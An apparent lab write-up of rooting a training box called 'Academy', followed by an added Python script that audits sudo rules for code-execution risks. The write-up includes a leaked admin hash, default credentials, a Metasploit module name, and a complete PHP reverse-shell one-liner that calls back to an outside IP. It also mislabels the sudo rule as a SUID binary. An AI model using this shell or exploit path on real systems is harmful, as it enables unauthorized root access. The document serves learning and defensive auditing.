Academy

Personal Rating: Easy

For this Starting Point box I do not have much documentation.

At http://10.129.70.149/data/users/admin.xml there was some interesting information to be found:

<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>

I could also log into http://10.129.70.149/admin/settings.php with the very easy-to-guess credentials admin:admin.

SSH with either of the two credential sets did not work.

From the other information I had about the page and webserver I used searchsploit to find a likely vulnerability. This module worked to get a meterpreter shell: exploit/multi/http/getsimplecms_unauth_code_exec

With that I could get a user shell as www-data

sudo -l showed me that php could be executed as admin from the www-data user (SUID binary), so I used this PHP reverse shell:

sudo php -r '$sock=fsockopen("10.10.15.13",4488);exec("/bin/sh -i <&3 >&3 2>&3");'

(with sudo nc -lnvp 4488 on my host)

With that I already had a working shell on the box as root
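From the defender's side, the sudo rule found above is the thing to catch in an audit. The following is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that grant an interpreter or other code-executing program. The sample output, the hostname `examplehost` and the list of flagged programs are constructed for illustration.

```python
import os
import re

# Programs that run arbitrary code or spawn a shell once started under sudo.
# Illustrative list chosen for this example, not exhaustive.
CODE_EXEC = {"php", "python", "perl", "ruby", "node", "lua", "bash", "sh",
             "vi", "vim", "awk", "find", "env"}

# One rule line from `sudo -l`: "    (runas) TAG: TAG: cmd, cmd"
RULE = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample output (not captured from the box in the write-up).
SAMPLE = """\
Matching Defaults entries for www-data on examplehost:
    env_reset, mail_badpass

User www-data may run the following commands on examplehost:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/sbin/service apache2 reload
"""

def risky_sudo_entries(sudo_l_output):
    """Return (runas, nopasswd, command) for rules that hand out code execution."""
    findings, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rule lines only follow this header
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",") if c.strip()):
            # Drop version suffixes so php7.4 and python3 match the base name.
            name = re.sub(r"[\d.]+$", "", os.path.basename(cmd.split()[0]))
            if cmd == "ALL" or name in CODE_EXEC:
                findings.append((m.group("runas").strip(), nopasswd, cmd))
    return findings

if __name__ == "__main__":
    for runas, nopasswd, cmd in risky_sudo_entries(SAMPLE):
        auth = "no password" if nopasswd else "password required"
        print(f"REVIEW: {cmd} as ({runas}), {auth}")
```

Feed it the output of `sudo -l -U <account>` for each service account such as www-data; any finding means a compromise of that account's process is a compromise of the run-as user.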
